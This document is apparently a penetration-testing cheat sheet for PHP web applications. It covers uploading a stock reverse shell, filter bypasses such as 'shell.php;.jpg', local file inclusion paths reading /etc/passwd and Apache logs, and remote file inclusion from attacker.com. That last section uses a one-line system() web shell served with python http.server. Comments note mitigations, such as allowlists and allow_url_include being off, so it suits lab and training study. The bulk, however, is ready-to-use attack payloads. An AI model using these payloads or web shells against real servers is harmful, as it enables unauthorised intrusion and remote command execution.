File Upload
# PHP reverse shell: copy the stock script into the working directory as shell.php
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
# Edit IP & port, upload, trigger: http://target/uploads/shell.php
# (the request only runs the script if the upload directory is web-reachable and
# PHP-enabled; storing uploads outside the web root, or with script execution
# disabled for that directory, stops this)
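# Filter bypasses (each one works only against a specific weak check; an extension allowlist plus server-generated filenames defeats the filename variants)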
shell.pHp5
shell.php;.jpg
Content-Type: image/jpeg (set in Burp while the body is still PHP code; the header is client-supplied, so a filter that trusts it verifies nothing)
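# Double extensions or magic bytes (PNG/JPG header followed by a PHP payload); these pass filters that inspect only part of the filename or the leading bytes rather than how the server will handle the stored file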
LFI
# Basic LFI test
/index.php?page=../../../../etc/passwd
# LFI with null byte to cut off a suffix the application appends, e.g. ".php" (older PHP only; fixed in PHP 5.3.4)
/index.php?page=../../../../etc/passwd%00
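# Apache log poisoning (when no upload is available); works only if the PHP process can read the access log, so restrictive log permissions block it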
/index.php?page=/var/log/apache2/access.log
# /proc/self/environ shell (old trick)
/index.php?page=/proc/self/environ
RFI
/index.php?page=http://attacker.com/shell.txt
# Host payload on your listener:
# (RFI is only reachable when the target's PHP has allow_url_include enabled;
# that directive is off by default, and leaving it off closes this path)
# Writes a one-line PHP file that passes the `cmd` query parameter to system().
echo "<?php system(\$_GET['cmd']); ?>" > shell.txt
# Serves the current directory over HTTP on port 80, i.e. every file in it,
# not just shell.txt.
python3 -m http.server 80